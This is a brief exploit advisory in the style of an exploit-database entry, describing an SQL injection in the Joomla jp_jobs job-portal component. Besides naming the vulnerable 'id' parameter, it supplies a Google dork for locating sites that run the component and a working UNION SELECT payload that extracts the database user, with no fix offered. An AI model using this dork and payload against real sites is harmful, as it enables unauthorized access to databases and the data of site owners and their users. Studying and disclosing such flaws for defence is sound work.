# Exploit Title: Joomla component jp_jobs SQL Injection vulnerability # Date: 03.04.2010 # Author: Valentin # Category: webapps/0day # Version: # Tested on: # CVE : # Code : :: General information :: Joomla component jp_jobs SQL Injection vulnerability :: by Valentin Hoebel :: valentin@xenuser.org :: Product information :: Name = jp_jobs :: Vendor = Joomla! Projects :: Vendor Website = http://www.joomlanetprojects.com/ :: About the product = http://extensions.joomla.org/extensions/ads-a-affiliates/jobs-a-recruitment/11163 :: Affected versions = All, latest one is 1.4.1 :: Google dork: "inurl:index.php?option=com_jp_jobs" :: SQL Injection vulnerability The component is extremly useful when it comes down to implementing some sort of job portal into your Joomla website. Injecting SQL commands while viewing details about a job is possible. Vulnerable URL http://some-cool-domain.tld/index.php?option=com_jp_jobs&view=detail&id=1 Test URL http://some-cool-domain.tld/index.php?option=com_jp_jobs&view=detail&id=' Exploit vulnerability, e.g. by displaying the MySQL user: index.php?option=com_jp_jobs&view=detail&id=1+AND+1=2+UNION+SELECT+concat(user())--